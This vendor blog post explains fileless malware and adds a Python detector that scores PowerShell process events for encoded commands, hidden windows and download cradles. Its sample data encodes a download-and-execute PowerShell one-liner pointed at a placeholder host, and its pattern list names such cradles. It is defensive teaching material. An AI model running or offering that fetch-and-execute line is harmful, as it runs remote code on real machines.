Let’s face it, securing your data isn’t as simple as downloading antivirus software anymore. To be frank, it hasn’t been for a while now. Cybercriminals are always searching for ways to undermine your first lines of defense, and if you’re not careful, you could be just one mis-click away from a security breach.
2017 changed the game with the introduction of fileless malware – a type of attack that easily bypasses every basic security defense. According to Symantec’s 2019 Internet Security Threat Report, fileless malware is on the rise and it’s one of the biggest digital infiltration threats to companies to date.
Traditional anti-malware software works by scanning the files on a computer’s storage drives. If the software finds files that match any of thousands of predetermined signatures, they are flagged as malware. Attackers are increasingly adapting to this method of defense by employing what is called a fileless attack, also known as a zero-footprint attack or non-malware attack. These attacks are categorized as low-observable characteristic (LOC) attacks, which means it is difficult for security solutions to identify and protect against them.
The Ponemon Institute estimates that fileless attacks are about 10 times more likely to succeed than file-based attacks.
In its 2019 Roundup Report, Trend Micro reported that detections of fileless attacks surged by 265% in the first half of 2019 alone compared with the same period of the previous year.
Fileless malware is not dependent on files being installed or executed. Just like traditional malware attacks, a device is infected after a user-initiated action (such as clicking a malicious email link or downloading a compromised software package). In some cases, by abusing PowerShell, certain fileless variants have been seen moving laterally across networks, infecting other computers on the same network.
Without being stored in a file or installed directly on a machine, the infection goes straight into memory and the malicious content never touches the hard drive. And because fileless malware doesn’t write anything to disk the way traditional malware does, it leaves behind no apparent trace of its existence, which allows it to evade antivirus software that relies on scanning files.
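Because a memory-only payload leaves no file for a signature scanner to match, defenders look at process telemetry instead: which process launched PowerShell, what arguments it received, and what an encoded command decodes to. The script below is an added example written for this post, not code from the original article or from Steadfast; it scores constructed process-creation events (a simplified `pid|parent|image|command_line` form, not a real log format) against weighted indicators taken from MITRE ATT&CK T1059.001 guidance. The parent-process set, weights and alert threshold are assumptions chosen for illustration.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Weighted indicators of PowerShell abuse. None of these is a file signature;
# they describe how the interpreter was launched and what it was asked to do.
INDICATORS = [
    (re.compile(r"(?<!\w)-(?:e|ec|enc|encodedcommand)\b", re.I), 2, "encoded command argument"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2, "hidden window"),
    (re.compile(r"-ex(?:ecutionpolicy)?\s+bypass", re.I), 1, "execution policy bypass"),
    (re.compile(r"\biex\b|invoke-expression", re.I), 3, "in-memory execution (Invoke-Expression)"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I), 3, "download cradle"),
    (re.compile(r"frombase64string", re.I), 2, "runtime base64 decode"),
]
# Assumed set of document handlers that rarely have a legitimate reason to spawn PowerShell.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
ALERT_THRESHOLD = 5  # assumed tuning value
ENCODED_ARG = re.compile(r"(?<!\w)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


@dataclass
class Finding:
    pid: str
    parent: str
    score: int
    reasons: List[str] = field(default_factory=list)
    decoded_command: Optional[str] = None


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand argument (base64 of UTF-16LE), or None."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(line: str) -> Optional[Finding]:
    """Score one process-creation event; non-PowerShell processes return None."""
    pid, parent, image, cmdline = line.split("|", 3)
    if not image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return None
    finding = Finding(pid=pid, parent=parent, score=0)
    if parent.lower() in OFFICE_PARENTS:
        finding.score += 3
        finding.reasons.append(f"spawned by document handler {parent}")
    finding.decoded_command = decode_encoded_command(cmdline)
    # Scan the visible command line and, when present, the decoded payload too:
    # the encoding is what hides the download cradle from a naive string match.
    for text, origin in ((cmdline, "command line"), (finding.decoded_command or "", "decoded command")):
        for pattern, weight, label in INDICATORS:
            if pattern.search(text):
                finding.score += weight
                finding.reasons.append(f"{label} in {origin}")
    return finding


def find_suspicious(events: List[str]) -> List[Finding]:
    """Return findings whose score reaches the alert threshold."""
    return [f for f in map(score_event, events) if f is not None and f.score >= ALERT_THRESHOLD]


def _fixture_encoded(text: str) -> str:
    # Builds the fixture's encoded argument the way PowerShell documents it (base64 over UTF-16LE).
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# Constructed sample events, not real telemetry. The URL is a reserved, non-resolving name.
SAMPLE_EVENTS = [
    "4412|explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe notes.txt",
    "5120|WINWORD.EXE|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
    + _fixture_encoded("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"),
    "5188|cmd.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\nightly-backup.ps1",
    "5200|services.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe -Command Get-Service -Name Spooler",
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print(f"pid {hit.pid} (parent {hit.parent}) score {hit.score}")
        for reason in hit.reasons:
            print("  -", reason)
        if hit.decoded_command:
            print("  decoded:", hit.decoded_command)
```

Only the Word-spawned event crosses the threshold; the administrator's scheduled backup script with `-ExecutionPolicy Bypass` scores a single point and is not flagged, which is the point of weighting rather than matching any one flag. In production this logic would run over Windows Security event 4688 (with command-line auditing enabled) or Sysmon event 1, and PowerShell script block logging (event 4104) captures the decoded content directly, so the decode step here mainly illustrates why encoded arguments must not be treated as opaque.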
According to the 2020 SonicWall Cyber Threat Report, cybercriminals are using new code obfuscation, sandbox detection and bypass techniques. This has resulted in a multitude of variants and the development of newer and more sophisticated exploit kits that use fileless attacks instead of writing traditional payloads to disk. While malware decreased 6% globally, SonicWall observed that most new threats masked their exploits within today’s most trusted file types. In fact, Office files (20.3%) and PDFs (17.4%) together represent 38% of the new threats detected by Capture ATP.
In December 2019, a fileless macOS malware was discovered being distributed as a piece of crypto trading software called UnionCryptoTrader.dmg. Attackers used a trojanized version of a legitimate crypto trading application installer, circulated from a crypto trading website called JMTTrading that offered a “smart cryptocurrency arbitrage trading platform.” At the time of writing, the security research service VirusTotal shows that only about half of Mac OS anti-virus apps can detect the malware – almost a year after it was discovered!
Because fileless malware is difficult to identify, the most effective way to avoid being affected is to ensure that your servers and other business machines can’t be easily compromised in the first place. Fileless malware is sophisticated, but like all malware, it depends on the existence of software vulnerabilities to exploit systems. The best way to close off those openings is to implement a multi-layered defense (defense in depth). By actively monitoring and accounting for the entire threat lifecycle, you give yourself the best possible chance against malicious attacks.
What are the components of a good defense in depth methodology? The key components involve software, hardware and business operation procedures. At a bare minimum, you will want:
Not all organizations have the resources to build and maintain these technologies and processes in-house. If your organization has gaps in the expertise needed to secure its infrastructure, consider a Steadfast Security and Compliance Consultation with our team to ensure the infrastructure your organization relies on is protected.
Editor's Note: This post was originally published in December of 2017 and has been completely revamped and updated for accuracy and comprehensiveness.